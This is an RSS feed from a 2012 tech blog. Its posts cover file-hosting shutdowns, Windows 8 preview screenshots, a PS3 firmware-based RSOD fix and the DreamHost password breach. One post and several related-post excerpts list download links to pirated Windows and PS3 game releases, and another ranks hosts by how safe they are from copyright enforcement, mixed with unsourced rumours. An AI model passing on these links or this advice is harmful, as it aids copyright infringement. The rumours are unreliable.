<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Smooth Blog &#187; Technology</title>
	<atom:link href="http://www.smoothblog.co.uk/category/tech-news/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.smoothblog.co.uk</link>
	<description>Updated Technology News</description>
	<lastBuildDate>Fri, 03 Feb 2012 21:25:06 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=</generator>
<xhtml:meta xmlns:xhtml="http://www.w3.org/1999/xhtml" name="robots" content="noindex" />
		<item>
		<title>File Hosting Sites News / Updates</title>
		<link>http://www.smoothblog.co.uk/2012/02/03/file-hosting-sites-news-updates/</link>
		<comments>http://www.smoothblog.co.uk/2012/02/03/file-hosting-sites-news-updates/#comments</comments>
		<pubDate>Fri, 03 Feb 2012 21:25:06 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://www.smoothblog.co.uk/?p=10290</guid>
		<description><![CDATA[Megaupload &#8211; Closed. FileServe &#8211; Stopped filesharing. You can only download your own files. Deleting multiple files. Banning Premium accounts. Closed Affiliate Program. FileJungle &#8211; Deleting files. Owned by Fileserve (same as above). Testing USA IP addresses blocking. FileSonic &#8211; Stopped filesharing. You can only download your own files. Closed Affiliate Program. Changed server location [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F02%2F03%2Ffile-hosting-sites-news-updates%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F02%2F03%2Ffile-hosting-sites-news-updates%2F&amp;source=smoothblog&amp;style=normal&amp;service=bit.ly&amp;service_api=R_69b2097aa0e1b6d642c5d4634b9831a7&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>Megaupload &#8211; Closed.<br />
FileServe &#8211; Stopped filesharing. You can only download your own files. Deleting multiple files. Banning Premium accounts. Closed Affiliate Program.<br />
FileJungle &#8211; Deleting files. Owned by Fileserve (same as above). Testing USA IP addresses blocking.<br />
FileSonic &#8211; Stopped filesharing. You can only download your own files. Closed Affiliate Program. Changed server location Jan 22, 2012. Taken down it&#8217;s Facebook page Now using Digital fingerprinting. Files are being deleted as soon as uploaded (as Hotfile did).<br />
UploadStation &#8211; Owned by Fileserve (same as above). Testing USA IP addresses blocking.<br />
VideoBB &#8211; Closed Affiliate Program.<br />
Uploaded &#8211; Banned U.S. and the FBI went after the owners who are gone.<br />
FilePost &#8211; Started suspending accounts with infringing material (as Hotfile did)<br />
Videoz &#8211; Closed Affiliate Program.<br />
4shared &#8211; Deleting files with copyright and waits in line at the FBI.<br />
MediaFire &#8211; Called to testify in the next 90 days and it will open doors pro FBI<br />
Org torrent &#8211; could vanish with everything within 30 days &#8220;he is under criminal investigation&#8221;<br />
Network Share mIRC &#8211; awaiting the decision of the case to continue or terminate Torrent everything.<br />
EnterUpload &#8211; Down (Redirect)<br />
Uploading &#8211; Closed for 90 days the affiliate program<br />
Koshiki &#8211; Operating 100% Japan will not join the SOPA / PIPA<br />
Shienko Box &#8211; 100% working China / Korea will not join the SOPA / PIPA<br />
ShareX BR &#8211; group UOL / BOL / iG say they will join the SOPA / PIPA</p>
<p>File hosting server hosted in these places are not safe.<br />
Hong Kong, New Zealand, USA, Netherlands, Canada, Germany, UK, Phillipines&#8230; and maybe more&#8230;</p>
<p>4shared, badongo, bitshare, fileserve.com, filepost, hotfile, mediafire, megaupload, sendspace, speedyshare, ugotfile, videozer, Wupload, xup.in, zshare.net &#8211; Server location is USA</p>
<p>Extabit.com, bigupload, crocko, filefactory, filesonic.com, freakshare, hulkshare, oron, share-online.biz, sharebase.to, speedshare.org, uploaded.to, uploadbox, yourfiles.biz &#8211; Server location is Netherlands</p>
<p>Filebase.to, kewlshare, kickload, netload.in, rapidshare.com, Hitfile.net &#8211; Server location is Germany</p>
<p>Load.to, share-now.net, tinyupload.com, zippyshare &#8211; Server location is France</p>
<p>Ge.tt &#8211; Server location is Ireland</p>
<p>Turbobit &#8211; Server location is Russia</p>
<p>According to Server location these sites are safe for now</p>
<p><strong>Ge.tt<br />
</strong>Location &#8211; Ireland / Denmark</p>
<p><strong>Turbobit.net</strong><br />
Location &#8211; Russia</p>
<p><strong>Cramit.in</strong><br />
Location &#8211; France</p>
<p><strong>Depositfiles.com</strong><br />
Location &#8211; Cyprus</p>
<div id="seo_alrp_related"><h2>Posts Related to File Hosting Sites News / Updates</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2008/11/03/defrag-exchange-2000/" rel="bookmark">Defrag Exchange 2000+</a></h3><p>I have had this question several times, so I will post the answer here so I can share it with the world. Things to do ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2012/01/09/splintercellhdps3psnduplex-released-download/" rel="bookmark">Splinter.Cell.HD.PS3.PSN-DUPLEX  Released &#8211; Download</a></h3><p>Splinter.Cell.HD.PS3.PSN-DUPLEX Size: 2599.16 MB http://www.filesonic.com/file/T7BLNru/Splinter.Cell.HD.PS3.PSN-DUPLEX.part1.rar http://fileserve.com/file/9Gvjn8q/Splinter.Cell.HD.PS3.PSN-DUPLEX.part1.rar http://filejungle.com/f/krFNyU/Splinter.Cell.HD.PS3.PSN-DUPLEX.part1.rar http://wupload.com/file/2636674267/Splinter.Cell.HD.PS3.PSN-DUPLEX.part1.rar Filesonic: http://www.filesonic.com/file/gfhOfp9/Splinter.Cell.HD.PS3.PSN-DUPLEX.SceneX.org.part1.rar http://www.filesonic.com/file/QNSb7iy/Splinter.Cell.HD.PS3.PSN-DUPLEX.SceneX.org.part3.rar Fileserve: http://www.fileserve.com/file/neDYmvX/Splinter.Cell.HD.PS3.PSN-DUPLEX.SceneX.org.part1.rar http://www.fileserve.com/file/3eqN6z5/Splinter.Cell.HD.PS3.PSN-DUPLEX.SceneX.org.part2.rar http://www.fileserve.com/file/tatHbhK/Splinter.Cell.HD.PS3.PSN-DUPLEX.SceneX.org.part3.rar Filejungle: http://www.filejungle.com/f/VkFmZU/Splinter.Cell.HD.PS3.PSN-DUPLEX.SceneX.org.part1.rar http://www.filejungle.com/f/ARBrx7/Splinter.Cell.HD.PS3.PSN-DUPLEX.SceneX.org.part2.rar http://www.filejungle.com/f/zYjjVM/Splinter.Cell.HD.PS3.PSN-DUPLEX.SceneX.org.part3.rar Depositfiles: http://depositfiles.com/files/i4330wfok/Splinter.Cell.HD.PS3.PSN-DUPLEX.SceneX.org.part1.rar http://depositfiles.com/files/aczjh0qav/Splinter.Cell.HD.PS3.PSN-DUPLEX.SceneX.org.part2.rar http://depositfiles.com/files/rztin978z/Splinter.Cell.HD.PS3.PSN-DUPLEX.SceneX.org.part3.rar Filepost: http://filepost.com/files/622dedc2/Splinter.Cell.HD.PS3.PSN-DUPLEX.SceneX.org.part2.rar/ ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/06/07/ios-5-beta-1-direct-download/" rel="bookmark">iOS 5 Beta 1 Direct Download</a></h3><p>On our last news about iOS 5, we had a link for those SDK subscribers, meaning that normal users would not be able to download ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/05/02/ios-433-changelog-whats/" rel="bookmark">iOS 4.3.3 Changelog &#8211; Whats New</a></h3><p>According to GBR, Apple gonna release it with the next two weeks, possibly sooner as what happend in iOS 4.3.1 and 4.3.2. What's new on ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2012/01/09/splintercellpandoratomorrowhdps3psnduplex-released-download/" rel="bookmark">Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX Released &#8211; Download</a></h3><p>Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX Size: 2994.63 MB http://www.filesonic.com/file/pZJQ0SF/Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX.part1.rar http://fileserve.com/file/ve2N8WQ/Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX.part1.rar http://filejungle.com/f/6hbhNE/Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX.part1.rar http://wupload.com/file/2636674417/Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX.part1.rar Filesonic: http://www.filesonic.com/file/QNSbc6Q/Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX.SceneX.org.part1.rar http://www.filesonic.com/file/CeZsYKK/Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX.SceneX.org.part2.rar Fileserve: http://www.fileserve.com/file/qKpz59Q/Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX.SceneX.org.part2.rar http://www.fileserve.com/file/hswkC84/Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX.SceneX.org.part3.rar Filejungle: http://www.filejungle.com/f/73QB4M/Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX.SceneX.org.part1.rar http://www.filejungle.com/f/VJ3QFN/Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX.SceneX.org.part2.rar http://www.filejungle.com/f/9yrrAE/Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX.SceneX.org.part3.rar Depositfiles: http://depositfiles.com/files/wr4gtnokh/Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX.SceneX.org.part1.rar http://depositfiles.com/files/ey4k7kfxb/Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX.SceneX.org.part3.rar Filepost: http://filepost.com/files/63795bad/Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX.SceneX.org.part2.rar/ http://filepost.com/files/8dc36134/Splinter.Cell.Pandora.Tomorrow.HD.PS3.PSN-DUPLEX.SceneX.org.part1.rar/</p></div></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://www.smoothblog.co.uk/2012/02/03/file-hosting-sites-news-updates/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Windows 8 Consumer Preview Screenshots</title>
		<link>http://www.smoothblog.co.uk/2012/02/02/windows-8-consumer-preview-screenshots/</link>
		<comments>http://www.smoothblog.co.uk/2012/02/02/windows-8-consumer-preview-screenshots/#comments</comments>
		<pubDate>Thu, 02 Feb 2012 18:32:18 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://www.smoothblog.co.uk/?p=10275</guid>
		<description><![CDATA[Italian site WindowsBlogItalia has posted the installation screenshots of Windows 8 consumer preview.  The screenshots is believed to be from Windows 8 build 8192 These screenshots have also cleared our doubts regarding the naming of the next public release and we can now safely call them as Windows 8 consumer preview. Posts Related to Windows [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F02%2F02%2Fwindows-8-consumer-preview-screenshots%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F02%2F02%2Fwindows-8-consumer-preview-screenshots%2F&amp;source=smoothblog&amp;style=normal&amp;service=bit.ly&amp;service_api=R_69b2097aa0e1b6d642c5d4634b9831a7&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>Italian site <a href="http://www.windowsblogitalia.com/2012/02/esclusiva-ecco-gli-screenshot-del-setup.html">WindowsBlogItalia</a> has posted the installation screenshots of <strong>Windows 8 consumer preview</strong>.  The screenshots is believed to be from Windows 8 build 8192</p>
<p><a href="http://windows8beta.com/wp-content/images/2012/02/Windows_8_consumer_preview_1.jpg"><img title="Windows_8_consumer_preview_1" src="http://windows8beta.com/wp-content/images/2012/02/Windows_8_consumer_preview_1.jpg" alt="" width="565" height="442" /></a></p>
<p><a href="http://windows8beta.com/wp-content/images/2012/02/Windows_8_consumer_preview_2.jpg"><img title="Windows_8_consumer_preview_2" src="http://windows8beta.com/wp-content/images/2012/02/Windows_8_consumer_preview_2.jpg" alt="" width="565" height="442" /></a></p>
<p><a href="http://windows8beta.com/wp-content/images/2012/02/Windows_8_consumer_preview_3.jpg"><img title="Windows_8_consumer_preview_3" src="http://windows8beta.com/wp-content/images/2012/02/Windows_8_consumer_preview_3.jpg" alt="" width="565" height="442" /></a></p>
<p><a href="http://windows8beta.com/wp-content/images/2012/02/Windows_8_consumer_preview_4.jpg"><img title="Windows_8_consumer_preview_4" src="http://windows8beta.com/wp-content/images/2012/02/Windows_8_consumer_preview_4.jpg" alt="" width="565" height="442" /></a></p>
<p><a href="http://windows8beta.com/wp-content/images/2012/02/Windows_8_consumer_preview_5.jpg"><img title="Windows_8_consumer_preview_5" src="http://windows8beta.com/wp-content/images/2012/02/Windows_8_consumer_preview_5.jpg" alt="" width="565" height="442" /></a></p>
<p>These screenshots have also cleared our doubts regarding the naming of the next public release and we can now safely call them as Windows 8 consumer preview.</p>
<div id="seo_alrp_related"><h2>Posts Related to Windows 8 Consumer Preview Screenshots</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/05/01/microsoft-windows-8-6279590-enterprise-m3-leaked/" rel="bookmark">Microsoft Windows 8 6.2.7959.0 Enterprise M3 Leaked</a></h3><p>The guys at betaarchive.com has been able to get their hands on the new Windows 8 6.2.7959 Enterprise release, which resembles a Windows 2008 R2 ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/08/18/windows-8-build-8064-screenshots-changelog/" rel="bookmark">Windows 8 build 8064 Screenshots and Changelog</a></h3><p>&nbsp; Screenshots and a changelog have leaked from what appears to be the latest Milestone 3 (M3) developer release of Windows 8. This leak comes ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2009/09/28/news-microsoft-confirms-no-windows-7-restrictions-for-netbooks/" rel="bookmark">News &#8211; Microsoft Confirms NO Windows 7 Restrictions for Netbooks</a></h3><p>Microsoft announced that they have removed the netbook restrictions that previously prevented OEM and ODM from installing any version of Windows 7 on their netbook. ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/09/14/windows-8-client-server-public-developer-preview-released-download/" rel="bookmark">Windows 8 Client and Server Public Developer Preview Released &#8211; Download</a></h3><p>The developer center is now live, and Windows 8 is now available for download from this link. The vanilla builds for x64 can be obtained ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2010/11/17/internet-explorer-9-preview-7-released/" rel="bookmark">Internet Explorer 9 Preview 7 Released</a></h3><p>Internet Explorer 9's preview platform is already leading the pack in HTML5 conformance tests, showing early signs Microsoft is doing something right with their latest ...</p></div></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://www.smoothblog.co.uk/2012/02/02/windows-8-consumer-preview-screenshots/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PS3 Red Screen of Death (RSOD) Fix Released &#8211; Download</title>
		<link>http://www.smoothblog.co.uk/2012/01/29/ps3-red-screen-death-rsod-fix-released-download/</link>
		<comments>http://www.smoothblog.co.uk/2012/01/29/ps3-red-screen-death-rsod-fix-released-download/#comments</comments>
		<pubDate>Sun, 29 Jan 2012 22:14:14 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://www.smoothblog.co.uk/?p=10260</guid>
		<description><![CDATA[Some developers have released a RSOD fix via GAMEOS. Now keep in mind if you truly have a hardware problem then this will most likely not help you. also there was a RSOD fix via debain installer. so for those of you that have linux on your ps3 and wish to fix like that can [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F29%2Fps3-red-screen-death-rsod-fix-released-download%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F29%2Fps3-red-screen-death-rsod-fix-released-download%2F&amp;source=smoothblog&amp;style=normal&amp;service=bit.ly&amp;service_api=R_69b2097aa0e1b6d642c5d4634b9831a7&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p>Some developers have released a RSOD fix via GAMEOS. Now keep in mind if you truly have a hardware problem then this will most likely not help you. also there was a RSOD fix via debain installer. so for those of you that have linux on your ps3 and wish to fix like that can use the linux pup.</p>
<p><strong>The RSOD Fix</strong></p>
<p><span style="text-decoration: underline;">Observations about RSOD:</span></p>
<ul>
<li>Seems to appear mostly on consoles with Samsung NORS (CECHL**-CECH20**)</li>
<li>May be caused by an error being thrown while writing to NOR (this is theory)</li>
<li>Mostly caused by a corrupt area of flash called VTRM</li>
</ul>
<p>The original RSOD &#8220;fix&#8221; was actually a CFW patch to bypass the RSOD.<br />
<span style="color: red;">basic_plugins.sprx</span> was modified to ignore the error condition to allow the console to boot.<br />
While this worked, certain things like trophies still didn&#8217;t work correctly.</p>
<p>The actual RSOD fix occurs by the VTRM area on flash being rewritten.<br />
The ability to do this is already built into the firmware, it just needs to be called.</p>
<p><span style="text-decoration: underline;">Steps from GameOS:</span></p>
<ul>
<li>1) Install the <strong>NORSOD patched PUP</strong> so that you can boot.</li>
<li>2) Install the <strong>rsodfix.gnpdrm.pkg</strong> package, and run it from XMB.</li>
<li>3) Run rsodfix.</li>
<li>4) Reboot and install whatever firmware you want</li>
</ul>
<p>Thanks go to: <span style="color: red;">&#8216;dospeidra, an0nymous, nikitis, robs&#8217;</span> for their efforts to help improve this PS3 &#8216;scene&#8217;!</p>
<p>File #1: <strong><span style="text-decoration: underline;"><a href="http://www.ps3scenefiles.com/file.php?id=300" target="_blank">NORSOD patched PUP</a></span></strong> (170mb)<br />
File #2: <strong><span style="text-decoration: underline;"><a href="http://www.ps3scenefiles.com/file.php?id=298" target="_blank">rsodfix.gnpdrm.pkg</a></span></strong> (616kb)</p>
<div id="seo_alrp_related"><h2>Posts Related to PS3 Red Screen of Death (RSOD) Fix Released - Download</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2012/01/22/install-pkg-ps3-firmware-40-retail-ofw/" rel="bookmark">How To &#8211; Install PKG On PS3 Firmware 4.0 Retail OFW</a></h3><p>Note: This modification does not allow the installation / usage of unsigned content / PS3 homebrew etc. This is purely a convenience hack and is ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/01/16/lv1-lv2-tools-ps3-released-flukes1/" rel="bookmark">LV1 and LV2 Tools for PS3 Released by Flukes1</a></h3><p>The PS3 homebrew scene is currently at a point where you can install userland packages, such as FTPDs and SNES emulators, but you still don’t ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2012/01/02/kado-releases-trueblue-patch-download/" rel="bookmark">KADO Releases True-Blue Patch for Downgraded PS3&#8242;s &#8211; Download</a></h3><p>PlayStation 3 developer Kado has released a patch for those who have downgraded their consoles and unable to use the True Blue dongle. He also ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/08/18/downgrade-ps3-firmware-370-355-teensy-progskeet/" rel="bookmark">How To &#8211; Downgrade PS3 Firmware 3.70 to 3.55 With Teensy Progskeet</a></h3><p>Please note, as of 8/17/11, this guide has been updated to remove a DANGEROUS ERROR. Please see below for any further updates: News reaches us ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2012/01/31/ps3-400-hfw-hybrid-firmware-25-released-download/" rel="bookmark">PS3 4.00 HFW (Hybrid Firmware) 2.5 Released &#8211; Download</a></h3><p>PlayStation 3 developer PS3Hen has released some updates regarding his Hybrid Firmware 4.0. This firmware mod requires a hardware flasher as well as a PlayStation ...</p></div></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://www.smoothblog.co.uk/2012/01/29/ps3-red-screen-death-rsod-fix-released-download/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>DreamHost Web Hosting Account Hacked</title>
		<link>http://www.smoothblog.co.uk/2012/01/29/dreamhost-web-hosting-account-hacked/</link>
		<comments>http://www.smoothblog.co.uk/2012/01/29/dreamhost-web-hosting-account-hacked/#comments</comments>
		<pubDate>Sun, 29 Jan 2012 02:11:42 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://www.smoothblog.co.uk/?p=10258</guid>
		<description><![CDATA[More details: Apparently, the breach occured in November via theone-click install wizard offered by Dreamhost: One click and your wholeWordpress / Drupal web site is installed, ready to use, automatically updatedby the wizard. Apparently, it’s the wizard itself that was compromised andanybody who used it was affected. DreamHost CEO issued the following statement: “our systems [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F29%2Fdreamhost-web-hosting-account-hacked%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F29%2Fdreamhost-web-hosting-account-hacked%2F&amp;source=smoothblog&amp;style=normal&amp;service=bit.ly&amp;service_api=R_69b2097aa0e1b6d642c5d4634b9831a7&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p><strong>More details:</strong></p>
<blockquote><p>Apparently, the breach occured in November via theone-click install wizard offered by Dreamhost: One click and your wholeWordpress / Drupal web site is installed, ready to use, automatically updatedby the wizard. Apparently, it’s the wizard itself that was compromised andanybody who used it was affected.</p></blockquote>
<p>DreamHost CEO <strong>issued the following statement</strong>:</p>
<blockquote><p>“our systems have stored and used encrypted passwords for a number of years, however the hacker found a legacy pool of unencrypted FTP/shell passwords in a database table that we had not previously deleted. We’ve now confirmed that there are no more legacy unencrypted passwords in our systems. And we’re investigating further measures to ensure security of passwords including when a customer requests their password by email (this was not the issue here, though).”</p></blockquote>
<p>Next to shell and FTP passwords, the company is advising its customers to change email passwords as well.</p>
<div id="seo_alrp_related"><h2>Posts Related to DreamHost Web Hosting Account Hacked</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/01/21/trapster-hacked/" rel="bookmark">Trapster Hacked</a></h3><p>Trapster, has issued an email to its 10 million registered members, citing that their passwords may have been hacked. The mobile application is available on ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2010/01/11/virtualnames-hacked/" rel="bookmark">VirtualNames Hacked</a></h3><p>Whats going on with all of these hosting companies being hacked? Here we have an apology email from VirtualNames to its customers: Dear Virtualnames customer, ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/01/31/sourceforge-hacked-account-passwords-resetted/" rel="bookmark">SourceForge Hacked &#8211; Account Passwords Resetted</a></h3><p>Seems like the week of getting big websites hacked, hackers seems to be going on a hack-spree. As quoted by SourceForge We recently experienced a ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/06/16/lulzsec-releases-62000-hacked-passwords-writerspacecom/" rel="bookmark">LulzSec Releases Over 62000 Hacked Passwords from Writerspace.com</a></h3><p>Rogue hacker group LulzSec is at it again, recently boasting on its Twitter that it had hacked the accounts of over 62,000 and provided a ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2009/10/18/only-4-of-corporate-it-users-stick-to-password-rules/" rel="bookmark">Only 4% of Corporate IT Users Stick to Password Rules</a></h3><p>Researchers at the University of Wisconsin-Madison and IT University, Copenhagen surveyed 836 members of staff at a company that handles sensitive information about their use ...</p></div></li></ul></div>]]></content:encoded>
			<wfw:commentRss>http://www.smoothblog.co.uk/2012/01/29/dreamhost-web-hosting-account-hacked/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>MICROSOFT.WINDOWS.8.RC1.ISO-LZ0 Released &#8211; Download</title>
		<link>http://www.smoothblog.co.uk/2012/01/29/microsoftwindows8rc1isolz0-released-download/</link>
		<comments>http://www.smoothblog.co.uk/2012/01/29/microsoftwindows8rc1isolz0-released-download/#comments</comments>
		<pubDate>Sun, 29 Jan 2012 00:23:34 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Technology]]></category>

		<guid isPermaLink="false">http://www.smoothblog.co.uk/?p=10251</guid>
		<description><![CDATA[Download MICROSOFT.WINDOWS.8.RC1.ISO-LZ0 Rapidshare http://rapidshare.com/files/402971244/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part1.rar http://rapidshare.com/files/1787050675/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part2.rar DepositFiles http://depositfiles.com/files/80o9w6aee http://depositfiles.com/files/ui7l4ywcw TurboBit http://turbobit.net/2o95g2norite/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part2.rar.html http://turbobit.net/sti7wibc65di/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part1.rar.html Posts Related to MICROSOFT.WINDOWS.8.RC1.ISO-LZ0 Released - DownloadiOS 4.2 GM Direct DownloadShould have posted these before the last news, anyways here you go: Download iOS 4.2 GM for iPad [Multiupload - MegaUpload - DepositFiles] Download iOS ...iOS 5 Beta 1 Direct DownloadOn our last news [...]]]></description>
			<content:encoded><![CDATA[<div class="tweetmeme_button" style="float: right; margin-left: 10px;">
			<a href="http://api.tweetmeme.com/share?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F29%2Fmicrosoftwindows8rc1isolz0-released-download%2F"><br />
				<img src="http://api.tweetmeme.com/imagebutton.gif?url=http%3A%2F%2Fwww.smoothblog.co.uk%2F2012%2F01%2F29%2Fmicrosoftwindows8rc1isolz0-released-download%2F&amp;source=smoothblog&amp;style=normal&amp;service=bit.ly&amp;service_api=R_69b2097aa0e1b6d642c5d4634b9831a7&amp;b=2" height="61" width="50" /><br />
			</a>
		</div>
<p><strong>Download MICROSOFT.WINDOWS.8.RC1.ISO-LZ0</strong></p>
<p><strong>Rapidshare</strong><br />
<a href="http://rapidshare.com/files/402971244/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part1.rar">http://rapidshare.com/files/402971244/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part1.rar</a><br />
<a href="http://rapidshare.com/files/1787050675/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part2.rar">http://rapidshare.com/files/1787050675/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part2.rar</a></p>
<p><strong>DepositFiles</strong><br />
<a href="http://depositfiles.com/files/80o9w6aee">http://depositfiles.com/files/80o9w6aee</a><br />
<a href="http://depositfiles.com/files/ui7l4ywcw">http://depositfiles.com/files/ui7l4ywcw</a></p>
<p><strong>TurboBit</strong><br />
<a href="http://turbobit.net/2o95g2norite/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part2.rar.html">http://turbobit.net/2o95g2norite/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part2.rar.html</a><br />
<a href="http://turbobit.net/sti7wibc65di/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part1.rar.html">http://turbobit.net/sti7wibc65di/MICROSOFT.WINDOWS.8.RC1.ISO-LZ0.1500.part1.rar.html</a></p>
<p><img id="nfo_image" src="http://nfomation.net/nfo.white/1327793255.linezer0.nfo.png" alt="" /></p>
<div id="seo_alrp_related"><h2>Posts Related to MICROSOFT.WINDOWS.8.RC1.ISO-LZ0 Released - Download</h2><ul><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2010/11/02/ios-4-2-gm-direct-download/" rel="bookmark">iOS 4.2 GM Direct Download</a></h3><p>Should have posted these before the last news, anyways here you go: Download iOS 4.2 GM for iPad [Multiupload - MegaUpload - DepositFiles] Download iOS ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/06/07/ios-5-beta-1-direct-download/" rel="bookmark">iOS 5 Beta 1 Direct Download</a></h3><p>On our last news about iOS 5, we had a link for those SDK subscribers, meaning that normal users would not be able to download ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2012/02/03/file-hosting-sites-news-updates/" rel="bookmark">File Hosting Sites News / Updates</a></h3><p>Megaupload - Closed. FileServe - Stopped filesharing. You can only download your own files. Deleting multiple files. Banning Premium accounts. Closed Affiliate Program. FileJungle - ...</p></div></li><li><div class="seo_alrp_rl_content"><h3><a href="http://www.smoothblog.co.uk/2011/04/03/multiman-011613-released-download/" rel="bookmark">multiMAN 